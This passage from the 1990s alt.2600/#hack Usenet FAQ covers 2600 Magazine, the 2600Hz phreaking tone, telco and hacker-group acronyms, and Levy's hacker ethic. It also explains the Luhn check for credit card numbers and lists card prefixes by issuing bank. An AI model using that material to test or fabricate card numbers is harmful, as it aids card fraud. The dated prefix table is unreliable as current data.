  4874.        Fort George G. Meade, MD  20755-6000
  4875.  
  4876.        Barbara Keller
  4877.        (410) 766-8729
  4878.  
  4879. If you ask to be put on the mailing list, you'll get a copy of each new
  4880. book as it comes out (typically a couple a year).
  4881.  
  4882. [* == I have not personally seen this book]
  4883. [+ == I have not personally seen this book, and I believe it may not]
  4884. [     be available]
  4885.  
  4886.  
  4887.  
  4888.  
  4889. Section D: 2600
  4890. ~~~~~~~~~~~~~~~
  4891.  
  4892. 01. What is alt.2600?
  4893.  
  4894. Alt.2600 is a Usenet newsgroup for discussion of material relating to
  4895. 2600 Magazine, the hacker quarterly.   It is NOT for the Atari 2600
  4896. game machine.  Len@netsys.com created the group on Emmanuel
  4897. Goldstein's recommendation.  Emmanuel is the editor/publisher of 2600
  4898. Magazine. Following the barrage of postings about the Atari machine to
  4899. alt.2600, an alt.atari.2600 was created to divert all of the atari
  4900. traffic from alt.2600.  Atari 2600 people are advised to hie over to
  4901. rec.games.video.classic.
  4902.  
  4903.  
  4904. 02. What does "2600" mean?
  4905.  
  4906.     2600Hz was a tone that was used by early phone phreaks (or
  4907. phreakers) in the 80's, and some currently.  If the tone was sent down the
  4908. line at the proper time, one could get away with all sorts of fun stuff.  
  4909.  
  4910. A note from Emmanuel Goldstein:
  4911.     
  4912. "The Atari 2600 has NOTHING to do with blue boxes or telephones
  4913. or the 2600 hertz tone.  The 2600 hertz tone was simply the first
  4914. step towards exploring the network.  If you were successful at 
  4915. getting a toll call to drop, then billing would stop at that
  4916. point but there would be billing for the number already dialed
  4917. up until the point of seizure.  800 numbers and long distance
  4918. information were both free in the past and records of who called
  4919. what were either non-existent or very obscure with regards to
  4920. these numbers.  This, naturally, made them more popular than
  4921. numbers that showed up on a bill, even if it was only for
  4922. a minute.  Today, many 800 numbers go overseas, which provides
  4923. a quick and free way into another country's phone system
  4924. which may be more open for exploration."
  4925.  
  4926.  
  4927. 03. Are there on-line versions of 2600 available?
  4928.  
  4929.     No.
  4930.  
  4931.  
  4932. 04. I can't find 2600 at any bookstores.  What can I do?
  4933.  
  4934. Subscribe.  Or, let 2600 know via the subscription address that you
  4935. think 2600 should be in the bookstore.  Be sure to include the
  4936. bookstores name and address.
  4937.  
  4938.  
  4939. 05. Why does 2600 cost more to subscribe to than to buy at a newsstand?
  4940.  
  4941. A note from Emmanuel Goldstein:
  4942.  
  4943.   We've been selling 2600 at the same newsstand price ($4) since 1988
  4944.   and we hope to keep it at that price for as long as we can get away
  4945.   with it. At the same time, $21 is about the right price to cover
  4946.   subscriber costs, including postage and record keeping, etc. People
  4947.   who subscribe don't have to worry about finding an issue someplace,
  4948.   they tend to get issues several weeks before the newsstands get
  4949.   them, and they can take out free ads in the 2600 Marketplace.
  4950.  
  4951.   This is not uncommon in the publishing industry.  The NY Times, for
  4952.   example, costs $156.50 at the newsstands, and $234.75 delivered to your
  4953.   door.
  4954.  
  4955.  
  4956.  
  4957.  
  4958. Section E: Miscellaneous
  4959. ~~~~~~~~~~~~~~~~~~~~~~~~
  4960.  
  4961. 01. What does XXX stand for?
  4962.  
  4963. TLA     Three Letter Acronym
  4964.  
  4965. ACL     Access Control List
  4966. PIN     Personal Identification Number
  4967. TCB     Trusted Computing Base
  4968.  
  4969. ALRU    Automatic Line Record Update
  4970. AN      Associated Number
  4971. ARSB    Automated Repair Service Bureau
  4972. ATH     Abbreviated Trouble History
  4973. BOC     Bell Operating Company
  4974. BOR     Basic Output Report
  4975. BOSS    Business Office Servicing System
  4976. CA      Cable
  4977. COE     Central Office Equipment
  4978. COSMOS  Computer System for Main Frame Operations
  4979. CMC     Construction Maintenance Center
  4980. CNID    Calling Number IDentification
  4981. CO      Central Office
  4982. COCOT   Customer Owned Coin Operated Telephone
  4983. CRSAB   Centralized Repair Service Answering Bureau
  4984. DDD     Direct Distance Dialing
  4985. ECC     Enter Cable Change
  4986. LD      Long Distance
  4987. LMOS    Loop Maintenance Operations System
  4988. MLT     Mechanized Loop Testing
  4989. NPA     Numbering Plan Area
  4990. POTS    Plain Old Telephone Service
  4991. RBOC    Regional Bell Operating Company
  4992. RSB     Repair Service Bureau
  4993. SS      Special Service
  4994. TAS     Telephone Answering Service
  4995. TH      Trouble History
  4996. TREAT   Trouble Report Evaluation and Analysis Tool
  4997.  
  4998. LOD     Legion of Doom
  4999. HFC     Hell Fire Club
  5000. TNO     The New Order
  5001.  
  5002. ACiD    Ansi Creators in Demand
  5003. CCi     Cybercrime International
  5004. FLT     Fairlight
  5005. iCE     Insane Creators Enterprise
  5006. iNC     International Network of Crackers
  5007. NTA     The Nocturnal Trading Alliance
  5008. PDX     Paradox
  5009. PE      Public Enemy
  5010. PSY     Psychose
  5011. QTX     Quartex
  5012. RZR     Razor (1911)
  5013. S!P     Supr!se Productions
  5014. TDT     The Dream Team
  5015. THG     The Humble Guys
  5016. THP     The Hill People
  5017. TRSI    Tristar Red Sector Inc.
  5018.  
  5019.  
  5020. 02. How do I determine if I have a valid credit card number?
  5021.  
  5022. Credit cards use the Luhn Check Digit Algorithm.  The main purpose of
  5023. this algorithm is to catch data entry errors, but it does double duty
  5024. here as a weak security tool.
  5025.  
  5026. For a card with an even number of digits, double every odd numbered
  5027. digit and subtract 9 if the product is greater than 9.  Add up all the
  5028. even digits as well as the doubled-odd digits, and the result must be
  5029. a multiple of 10 or it's not a valid card.  If the card has an odd
  5030. number of digits, perform the same addition doubling the even numbered
  5031. digits instead.
  5032.  
  5033.  
  5034. 03. What bank issued this credit card?
  5035.  
  5036. 1033    Manufacturers Hanover Trust
  5037. 1035    Citibank
  5038. 1263    Chemical Bank
  5039. 1665    Chase Manhattan
  5040. 4024    Bank of America
  5041. 4128    Citicorp
  5042. 4209    New Era Bank
  5043. 4302    HHBC
  5044. 4310    Imperial Savings
  5045. 4313    MBNA
  5046. 4317    California Federal
  5047. 5282    Wells Fargo
  5048. 5424    Citibank
  5049. 5410    Wells Fargo
  5050. 5432    Bank of New York
  5051. 6017    MBNA
  5052.  
  5053.  
  5054. 04. What are the ethics of hacking?
  5055.  
  5056. The FAQ answer is excerpted from: Hackers: Heroes of the Computer Revolution
  5057.                                   by Steven Levy
  5058.  
  5059. Access to computers -- and anything which might teach you something
  5060. about the way the world works -- should be unlimited and total.
  5061. Always yield to the Hands-On imperative.
  5062.  
  5063. All information should be free.
  5064.  
  5065. Mistrust Authority.  Promote Decentralization.
  5066.  
  5067. Hackers should be judged by their hacking, not bogus criteria such as
  5068. degrees, age, race, or position.
  5069.  
  5070. You can create art and beauty on a computer.
  5071.  
  5072. Computers can change your life for the better.
  5073.  
  5074.  
  5075. 04. Where can I get a copy of the alt.2600/#hack FAQ?
  5076.  
  5077. Get it on FTP at:
  5078. rahul.net /pub/lps
  5079. rtfm.mit.edu /pub/usenet-by-group/alt.2600
  5080.  
  5081. Get it on the World Wide Web at:
  5082. http://dfw.net/~aleph1
  5083. http://www.engin.umich.edu/~jgotts/hack-faq.html
  5084. http://www.phantom.com/~king
  5085.  
  5086. Get it by E-Mail at:
  5087. hackfaq@sekurity.com  (Subject: send faq)
  5088.  
  5089.  
  5090.  
  5091.  
  5092. EOT
  5093.  
  5094.